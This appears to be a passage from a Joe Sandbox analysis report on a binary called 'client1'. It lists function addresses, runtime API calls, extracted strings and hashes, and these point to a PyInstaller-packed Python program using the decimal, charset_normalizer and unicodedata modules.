                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Long_$From$Err_Long$ContextMemoryObject_PackSsize_tStringTuple_Var_memmove
                                                    • String ID: cannot convert Infinity to integer ratio$cannot convert NaN to integer ratio
                                                    • API String ID: 1408862507-4268672173
                                                    • Opcode ID: 2468196f3f44b967afc3cb20012d2157185b627e75dc1f7666c23227b6620d06
                                                    • Instruction ID: d77058fb3c2d1829783cca2daa46c4a1701f6b97ca1f4d4ef0e933b483b0b62b
                                                    • Opcode Fuzzy Hash: 2468196f3f44b967afc3cb20012d2157185b627e75dc1f7666c23227b6620d06
                                                    • Instruction Fuzzy Hash: 49817EA1A0BA46C1EA578F39DD1417D6ADCAF45FD5F0814B2CD0E067A0EF2DE44B8720
                                                    Function 00007FFBAA70A924 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA0C
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA1A
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA28
                                                    • PyMem_Free.PYTHON311(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA99
                                                    • PyMem_Free.PYTHON311(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA70AAA7
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715E87
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715EAC
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715EC4
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715ED2
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715ED8
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F44
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F67
                                                    • memset.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F85
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715FD1
                                                    • PyMem_Free.PYTHON311(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA716005
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memmove$FreeMem___acrt_iob_func$abortfputcmemset
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$add_size_t(): overflow: check the context
                                                    • API String ID: 503873940-2766838800
                                                    • Opcode ID: bfc3c8d07391a6e6435fd712bf0b6596c4b327f7071a65179aed5de038bbeebc
                                                    • Instruction ID: 7a888d841ef9812b41936bcb24d8a215b4eafd2ae15ae57cb0b3701abd8e31f7
                                                    • Opcode Fuzzy Hash: bfc3c8d07391a6e6435fd712bf0b6596c4b327f7071a65179aed5de038bbeebc
                                                    • Instruction Fuzzy Hash: 6271DFD0B0B646D1F9269E32DA153BB5A8D6F44BD0F4480B6DD0D1BBE5EE3CE4478260
                                                    Function 00007FFBAB491D10 Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 214stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: strchr
                                                    • String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
                                                    • API String ID: 2830005266-262724644
                                                    • Opcode ID: 874ca092438a5339a713435a94bdedbb5f91fb948e3034079ecccedfb0d9badf
                                                    • Instruction ID: 640e1ab74408eb7d9846d7da64703752ad65b69110f96aee4f2e456ac0df7cf4
                                                    • Opcode Fuzzy Hash: 874ca092438a5339a713435a94bdedbb5f91fb948e3034079ecccedfb0d9badf
                                                    • Instruction Fuzzy Hash: 3F9172B1B0AA4692EF168B35E59013C67E4FB48B94F548139DE6D47BB8DF3CE8519300
                                                    Function 00007FFBAB495640 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FromLong_Ssize_t$CompareObject_Rich$BoolChainCode_DivideEmptyExceptionsFetchFormatFrame_Number_State_SubtypeThreadTrueType_
                                                    • String ID: __init__$bool$charset_normalizer.md.UnprintablePlugin$float$ratio
                                                    • API String ID: 101880591-3017791607
                                                    • Opcode ID: f45d2e226ab84ee4ec68ee4e9d3a8a90ebdaaf3c3f0194e72e8c17f4830e412a
                                                    • Instruction ID: 718ac35456d2fa6f8a3db53df1ddeba4908628f02aa391f4bc7178058775b711
                                                    • Opcode Fuzzy Hash: f45d2e226ab84ee4ec68ee4e9d3a8a90ebdaaf3c3f0194e72e8c17f4830e412a
                                                    • Instruction Fuzzy Hash: 188159A1A0BA4281FB669B36E99427D23A0EF45BA4F08C535DD7E077F5DF2CE4418340
                                                    Function 00007FFBAA717844 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_$__acrt_iob_func$fputc
                                                    • String ID: %s:%d: warning: $D:\a\1\s\Modules\_decimal\libmpdec\mpdecimal.c$libmpdec: internal error in _mpd_base_ndivmod: please report
                                                    • API String ID: 3941785396-1801843369
                                                    • Opcode ID: f47527f913d2a66f8e896ba17037a917f0ea3313601f2739433dc40459f4e032
                                                    • Instruction ID: c4af8290376719b0a3a1351667b39d466f74986361f27e36e08fd4b06b8089d3
                                                    • Opcode Fuzzy Hash: f47527f913d2a66f8e896ba17037a917f0ea3313601f2739433dc40459f4e032
                                                    • Instruction Fuzzy Hash: 5EC17FB2A0AB45C9E7128F75D4412EE27E9BB44B88F0041B2DE4E177A9DF7CD50AC760
                                                    Function 00007FFBAB497410 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$BoolCompareDivideNumber_Object_RichSubtypeTrueType_
                                                    • String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$float$ratio
                                                    • API String ID: 802557476-1911822692
                                                    • Opcode ID: 2f1a14135aac1993272bca4400cba88a50f561f1b04a1fc196391771b24e3b97
                                                    • Instruction ID: 1cedd45f8e47f78c407af068ab7f621b4ce50164b924b55eed2b1440f615486e
                                                    • Opcode Fuzzy Hash: 2f1a14135aac1993272bca4400cba88a50f561f1b04a1fc196391771b24e3b97
                                                    • Instruction Fuzzy Hash: E76151A1A0FA0285FE569B36E89427D63A0AF45BE0F488235DD3E477F6DF2CE4518340
                                                    Function 00007FFBAA6F238C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFreeMem_$Object_$AttrErr_MemoryStringmemmove
                                                    • String ID: denominator$exact conversion for comparison failed
                                                    • API String ID: 3610791524-3218595679
                                                    • Opcode ID: 38cdf41f268258beab263b53bbaaa3de93e8eca75f7d5572cb4eb84eafd0fadd
                                                    • Instruction ID: 0d6c1ec94a945421937c53c08db8646e9f6f06ed964d658c2629899dc8a98155
                                                    • Opcode Fuzzy Hash: 38cdf41f268258beab263b53bbaaa3de93e8eca75f7d5572cb4eb84eafd0fadd
                                                    • Instruction Fuzzy Hash: D15191B2A0AB52C5EB12CF35D8542BD27A8BB44F94F0450B1DE4D066A4DF7CE54ACB60
                                                    Function 00007FFBAA70A53C Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DA6
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DCA
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DE1
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DEF
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DF5
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DFE
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E22
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E39
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E47
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E4D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: __acrt_iob_func$abortfputc
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$add_size_t(): overflow: check the context$mul_size_t(): overflow: check the context
                                                    • API String ID: 4224473327-4231770502
                                                    • Opcode ID: bd6d3835cd08eabc742edac99f748093eed2fa89b091dbba296b2b38ce6aef46
                                                    • Instruction ID: 866c3f8d34b5e297dafbde8925d3489b2d01993c6427c532d3ff453778f8d7b6
                                                    • Opcode Fuzzy Hash: bd6d3835cd08eabc742edac99f748093eed2fa89b091dbba296b2b38ce6aef46
                                                    • Instruction Fuzzy Hash: 1C2146E0B0A606D2EA075F30E8691BF26AABF84790F4041B6DD1E177F5DE2C954BD320
                                                    Function 00007FFBAB491060 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
                                                    • String ID: __mro_entries__ must return a tuple
                                                    • API String ID: 1865160900-2385075324
                                                    • Opcode ID: 467033a0127221bfa40f722767f11646d0dcbf4943d0c97cc8d9c43896cda3e2
                                                    • Instruction ID: fb788a86f95bdffb25da690bfeba43a5147281fcdde69fe5fd4528962b71bce0
                                                    • Opcode Fuzzy Hash: 467033a0127221bfa40f722767f11646d0dcbf4943d0c97cc8d9c43896cda3e2
                                                    • Instruction Fuzzy Hash: 40416AB2B0BA42A1EA169F76E99427DA3A4EF48BD4F09C035CE2D46774DF3CE0459301
                                                    Function 00007FFBAA7348C8 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$CompareString$With$DeallocErr_Ready
                                                    • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                    • API String ID: 1067165228-3528878251
                                                    • Opcode ID: a97fda713efcdaed74d0f15b89fc759eef65b993e3755085a36f180e1a2a6872
                                                    • Instruction ID: b988f50bc5ea979f777908f5ddaa70db4002d3e538d9a90ee6a0d6aa694fbe36
                                                    • Opcode Fuzzy Hash: a97fda713efcdaed74d0f15b89fc759eef65b993e3755085a36f180e1a2a6872
                                                    • Instruction Fuzzy Hash: 254182A1B0E657C9EA56AF32E8442372368BF45B86F8645B9CD4F47790DF6CE0069330
                                                    Function 00007FFBAB493E30 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
                                                    • String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
                                                    • API String ID: 2346549887-4201147154
                                                    • Opcode ID: 97c887f9a55379cd6061ec2239fa0885262fb877c9a2011c0a5dba965d3d668a
                                                    • Instruction ID: 45cbecc10efc526329283156c2ff8329bae3173542d41ca1beb7b17bd933bf15
                                                    • Opcode Fuzzy Hash: 97c887f9a55379cd6061ec2239fa0885262fb877c9a2011c0a5dba965d3d668a
                                                    • Instruction Fuzzy Hash: 97314AB2A0AB4295EA569F36E89427D63A0FF45FD4F098039DE2D06774DF3CE4458301
                                                    Function 00007FFBAA709EBC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: OO|O$optional argument must be a context
                                                    • API String ID: 3219279049-4143137676
                                                    • Opcode ID: a46515a4f6f2f69e0e60290085b09fabc6f98e0f00078889bc04a6c3a0490e87
                                                    • Instruction ID: e0e3d6ef61083c5dbcaae97c8a7108bd58104a1b562f98d5179f8168f5bda382
                                                    • Opcode Fuzzy Hash: a46515a4f6f2f69e0e60290085b09fabc6f98e0f00078889bc04a6c3a0490e87
                                                    • Instruction Fuzzy Hash: 77611BB2E1AA16D8EB168F75D8400BE27B8BB44B94F440076DE0E27664EE3DE546C360
                                                    Function 00007FF79F621440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                    • API String ID: 0-666925554
                                                    • Opcode ID: 1bbb5a14678834b1a958f942c3490a164635d270f47cc7c371ea8b9b6d09e3c4
                                                    • Instruction ID: 0190cd064c25e385b7292367919a27a15d736b7076455ffd5e4312f0d7858d72
                                                    • Opcode Fuzzy Hash: 1bbb5a14678834b1a958f942c3490a164635d270f47cc7c371ea8b9b6d09e3c4
                                                    • Instruction Fuzzy Hash: EC518C61B0C7C251FE30BB31A8506F9A39ABF45BA4F844531DE2D87796EE3CE5458321
                                                    Function 00007FF79F6278A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
